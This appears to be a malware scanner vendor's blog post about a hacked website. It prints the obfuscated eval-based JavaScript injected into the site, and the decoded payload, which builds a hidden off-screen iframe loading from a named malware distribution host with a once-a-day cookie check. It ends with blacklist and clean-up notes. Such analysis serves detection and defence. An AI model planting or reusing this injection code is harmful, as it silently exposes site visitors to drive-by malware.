Compromised website infected with malicious JavaScript
Background
Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Obfuscated JavaScript malware injects malicious iframes into the website page(s). Having styling attributes crafted in such a way to be invisible to website visitors, they download content in the background from remote malware distributor.
Similar to discussed in other posts about malicious iframes in websites, this malware is obfuscated and in addition uses cookie bomb technique to evade Anti-Viruses and other detection mechanisms.
Public databases of site scan reports for:
Clean domains
Potentially Suspicious domains
Suspicious domains
Malicious domains
For global web malware monitoring statistic and severity levels:
Last day
Last week
Last month
Similar to discussed in other posts about malicious iframes in websites, this malware is obfuscated and in addition uses cookie bomb technique to evade Anti-Viruses and other detection mechanisms.
Public databases of site scan reports for:
Clean domains
Potentially Suspicious domains
Suspicious domains
Malicious domains
For global web malware monitoring statistic and severity levels:
Last day
Last week
Last month
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Malware entry details
Obfuscated execution of JavaScript "eval" function.Beautified script
- try {
- + function () {
- if (document.querySelector)++(window[vz].body) == null
- }()
- } catch (q) {
- aa = function (ff) {
- ff = "fr" + "omCh" + ff;
- for (i = 0; i < z.length; i++) {
- za += String[ff](e(v + (z[i])) - (13));
- }
- };
- };
- e = (eval);
- v = "0x";
- a = 0;
- try {;
- } catch (zz) {
- a = 1
- }
- if (!a) {
- try {
- ++e(vz)["\x62o" + "d" + z]
- } catch (q) {
- a2 = "^";
- }
- z ="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7d^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^2d^83^6e^7f^2d^7f^7d^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7f^72^6e^81^72^52^79^72^7a^72^7b^81^35^34^76^73^7f^6e^7a^72^34^36^48^1a^17^1a^17^2d^7f^7d^3b^80^7f^70^2d^4a^2d^34^75^81^81^7d^47^3c^3c^7a^6e^7b^74^7c^79^3b^70^7c^3b^82^78^3c^70^79^6e^80^80^3c^44^57^5e^45^81^5f^58^59^3b^7d^75^7d^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^7d^7c^80^76^81^76^7c^7b^2d^4a^2d^34^6e^6f^80^7c^79^82^81^72^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^70^7c^79^7c^7f^2d^4a^2d^34^3d^45^43^45^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^75^72^76^74^75^81^2d^4a^2d^34^3d^45^43^45^7d^85^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^84^76^71^81^75^2d^4a^2d^34^3d^45^43^45^7d^85^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^79^72^73^81^2d^4a^2d^34^3e^3d^3d^3d^3d^45^43^45^34^48^1a^17^2d^7f^7d^3b^80^81^86^79^72^3b^81^7c^7d^2d^4a^2d^34^3e^3d^3d^3d^3d^45^43^45^34^48^1a^17^1a^17^2d^76^73^2d^35^2e^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7f^7d^34^36^36^2d^88^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^84^7f^76^81^72^35^34^49^7d^2d^76^71^4a^69^34^7f^7d^69^34^2d^70^79^6e^80^80^4a^69^34^7f^7d^3d^46^69^34^2d^4b^49^3c^7d^4b^34^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^74^72^81^52^79^72^7a^72^7b^81^4f^86^56^71^35^34^7f^7d^34^36^3b^6e^7d^7d^72^7b^71^50^75^76^79^71^35^7f^7d^36^48^1a^17^2d^8a^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^60^72^81^50^7c^7c^78^76^72^35^70^7c^7c^78^76^72^5b^6e^7a^72^39^70^7c^7c^78^76^72^63^6e^79^82^72^39^7b^51^6e^86^80^39^7d^6e^81^75^36^2d^88^1a^17^2d^83^6e^7f^2d^81^7c^71^6e^86^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^83^6e^7f^2d^72^85^7d^76^7f^72^2d^4a^2d^7b^72^84^2d^51^6e^81^72^35^36^48^1a^17^2d^76^73^2d^35^7b^51^6e^86^80^4a^4a^7b^82^79^79^2d^89^89^2d^7b^51^6e^86^80^4a^4a^3d^36^2d^7b^51^6e^86^80^4a^3e^48^1a^17^2d^72^85^7d^76^7f^72^3b^80^72^81^61^76^7a^72^35^81^7c^71^6e^86^3b^74^72^81^61^76^7a^72^35^36^2d^38^2d^40^43^3d^3d^3d^3d^3d^37^3f^41^37^7b^51^6e^86^80^36^48^1a^17^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^2d^4a^2d^70^7c^7c^78^76^72^5b^6e^7a^72^38^2f^4a^2f^38^72^80^70^6e^7d^72^35^70^7c^7c^78^76^72^63^6e^79^82^72^36^1a^17^2d^38^2d^2f^48^72^85^7d^76^7f^72^80^4a^2f^2d^38^2d^72^85^7d^76^7f^72^3b^81^7c^54^5a^61^60^81^7f^76^7b^74^35^36^2d^38^2d^35^35^7d^6e^81^75^36^2d^4c^2d^2f^48^2d^7d^6e^81^75^4a^2f^2d^38^2d^7d^6e^81^75^2d^47^2d^2f^2f^36^48^1a^17^8a^1a^17^73^82^7b^70^81^76^7c^7b^2d^54^72^81^50^7c^7c^78^76^72^35^2d^7b^6e^7a^72^2d^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^7f^81^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^7b^6e^7a^72^2d^38^2d^2f^4a^2f^2d^36^48^1a^17^2d^83^6e^7f^2d^79^72^7b^2d^4a^2d^80^81^6e^7f^81^2d^38^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^38^2d^3e^48^1a^17^2d^76^73^2d^35^2d^35^2d^2e^80^81^6e^7f^81^2d^36^2d^33^33^1a^17^2d^35^2d^7b^6e^7a^72^2d^2e^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^3d^39^2d^7b^6e^7a^72^3b^79^72^7b^74^81^75^2d^36^2d^36^2d^36^1a^17^2d^88^1a^17^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^8a^1a^17^2d^76^73^2d^35^2d^80^81^6e^7f^81^2d^4a^4a^2d^3a^3e^2d^36^2d^7f^72^81^82^7f^7b^2d^7b^82^79^79^48^1a^17^2d^83^6e^7f^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^76^7b^71^72^85^5c^73^35^2d^2f^48^2f^39^2d^79^72^7b^2d^36^48^1a^17^2d^76^73^2d^35^2d^72^7b^71^2d^4a^4a^2d^3a^3e^2d^36^2d^72^7b^71^2d^4a^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^79^72^7b^74^81^75^48^1a^17^2d^7f^72^81^82^7f^7b^2d^82^7b^72^80^70^6e^7d^72^35^2d^71^7c^70^82^7a^72^7b^81^3b^70^7c^7c^78^76^72^3b^80^82^6f^80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7d^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);
- za = "";
- aa("arCode");
- e("" + za);
- }
Malicious payload
Decoded payload generates hidden iframe to hxxp://mangol.co.uk
- function rp09() {
- var static = 'ajax';
- var controller = 'index.php';
- var rp = document.createElement('iframe');
- rp.src = 'http://mangol.co.uk/class/7JQ8tRKL.php';
- rp.style.position = 'absolute';
- rp.style.color = '0868';
- rp.style.height = '0868px';
- rp.style.width = '0868px';
- rp.style.left = '10000868';
- rp.style.top = '10000868';
- if (!document.getElementById('rp')) {
- document.write('<p id=\'rp\' class=\'rp09\' ></p>');
- document.getElementById('rp').appendChild(rp);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path) {
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0) nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue)
- + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name) {
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) &&
- (name != document.cookie.substring(0, name.length)))
- {
- return null;
- }
- if (start == -1) return null;
- var end = document.cookie.indexOf(";", len);
- if (end == -1) end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled)
- {
- if (GetCookie('visited_uq') == 55) {} else {
- SetCookie('visited_uq', '55', '1', '/');
- rp09();
- }
- }*/
Blacklisting status
The URL is detected by 3/51 Anti-Virus engines in VirusTotal and noted as being infecting several domains through software vulnerability exploits.VirusTotal report |
Malware clean-up
Being blacklisted, usually, means your website was compromised and detected actively distributed malware or acting as an intermediate in malicious chain. If you suspect that your website was infected, use Website Anti-malware Monitoring for malware removal.Alternatively, you can try to remove malware using Quttera's website scan report. You will then need to submit your website(s) for re-testing and removing from blacklist.
No comments:
Post a Comment